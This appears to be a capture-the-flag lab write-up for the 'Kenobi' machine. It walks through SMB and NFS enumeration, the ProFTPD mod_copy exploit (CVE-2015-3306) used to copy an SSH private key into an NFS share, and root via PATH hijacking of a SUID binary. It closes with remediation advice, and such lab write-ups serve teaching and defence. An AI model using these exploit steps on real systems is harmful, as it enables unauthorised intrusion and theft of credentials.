Target IP: 10.10.217.222 (Kenobi)
Difficulty: Easy
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
“Kenobi” is a Linux machine that demonstrates how chaining multiple service misconfigurations can lead to a full system compromise. Initial access is achieved by identifying a writable SMB share and a vulnerable ProFTPD service. By leveraging the mod_copy vulnerability in ProFTPD, we copy a private SSH key from the filesystem to the accessible NFS share, allowing for SSH login. Privilege escalation is achieved by exploiting a custom SUID binary (/usr/bin/menu) that executes system commands without absolute paths, allowing for PATH Manipulation.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap port and script scanning.
- T1021.002 (SMB/Windows Admin Shares): Enumerating anonymous SMB shares.
- T1210 (Exploitation of Remote Services): Exploiting ProFTPD
mod_copy(CVE-2015-3306). - T1574 (Hijack Execution Flow): Path Interception via SUID binary.
2. Information Gathering
A. Network Scanning
We begin with an Nmap scan to identify open ports and services.
nmap -sC -sV -oN nmap/kenobi 10.10.217.222Key Findings:
- 21/tcp (FTP): ProFTPD 1.3.5.
- 139/445 (SMB): Samba running on Ubuntu.
- 111/2049 (NFS): Network File System.
- 80/tcp (HTTP): Apache 2.4.18.
B. SMB Enumeration (Samba)
We enumerate the SMB shares to find accessible directories.
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.217.222Results:
\\10.10.217.222\anonymous: READ/WRITE access allowed.
We connect to the share and inspect its contents:
smbclient //10.10.217.222/anonymous
# Password: (Empty)
ls
get log.txt- Intel: The
log.txtfile reveals information about an SSH key generation for the userkenobiand the location of the ProFTPD configuration.
C. NFS Enumeration
Port 111 (RPC) indicates NFS shares might be available.
nmap -p 111 --script=nfs-ls,nfs-showmount 10.10.217.222Results:
/varis a mountable share.
3. Initial Access: The ProFTPD Exploit
A. Vulnerability Analysis
The scan identified ProFTPD 1.3.5. A search in exploit databases reveals the mod_copy vulnerability (CVE-2015-3306).
The Vulnerability:
The mod_copy module allows unauthenticated clients to use SITE CPFR (Copy From) and SITE CPTO (Copy To) commands to copy files anywhere on the filesystem (permissions permitting).
B. Exploitation Chain
We need to get the SSH private key (/home/kenobi/.ssh/id_rsa) to a location we can access. Since we can mount /var via NFS, we will copy the key there.
- Connect to FTP:
nc 10.10.217.222 21- Execute Copy Commands:
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa(Result: “250 Copy successful”) 3. Mount NFS Share:
mkdir /mnt/kenobiNFS
sudo mount 10.10.217.222:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS/tmpWe see id_rsa in the directory.
4. Retrieve Key & Login:
cp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.217.222Status: Access gained as user kenobi.
User Flag: /home/kenobi/user.txt
4. Privilege Escalation: Path Hijacking
A. SUID Enumeration
We search for files with the SUID bit set, which execute with the file owner’s privileges (often root).
find / -perm -u=s -type f 2>/dev/nullFinding: /usr/bin/menu looks non-standard.
B. Binary Analysis
Running the binary presents a menu to check status, kernel version, or run ifconfig.
We run strings on the binary to see how it calls these commands.
strings /usr/bin/menuOutput:
curl -I localhost
uname -r
ifconfigCritical Flaw: The binary calls curl, uname, and ifconfig without absolute paths (e.g., /usr/bin/curl). This means it relies on the system $PATH variable to find them.
C. Exploitation
We can “hijack” the path by creating a malicious script named curl, placing it in a folder (like /tmp), and adding that folder to the start of the $PATH.
- Create Payload:
cd /tmp
echo /bin/sh > curl
chmod 777 curl- Manipulate PATH:
export PATH=/tmp:$PATH- Execute Vulnerable Binary:
/usr/bin/menu
# Select option 1 (which calls 'curl')Result:
The binary runs our fake curl (which is actually /bin/sh) with SUID root privileges.
# whoami
root
cat /root/root.txt5. Remediation (Blue Team)
- ProFTPD: Upgrade ProFTPD to a version that patches the
mod_copyvulnerability or disable the module in the configuration if not needed. - Samba/NFS:
- Restrict NFS exports (
/var) to specific trusted IPs rather than*. - Ensure sensitive data (SSH keys) cannot be easily copied to public shares.
- SUID Binaries:
- Use absolute paths (e.g.,
/usr/bin/curl) in scripts and binaries compiled for administrative tasks. - sanitize environment variables within SUID binaries to prevent PATH manipulation.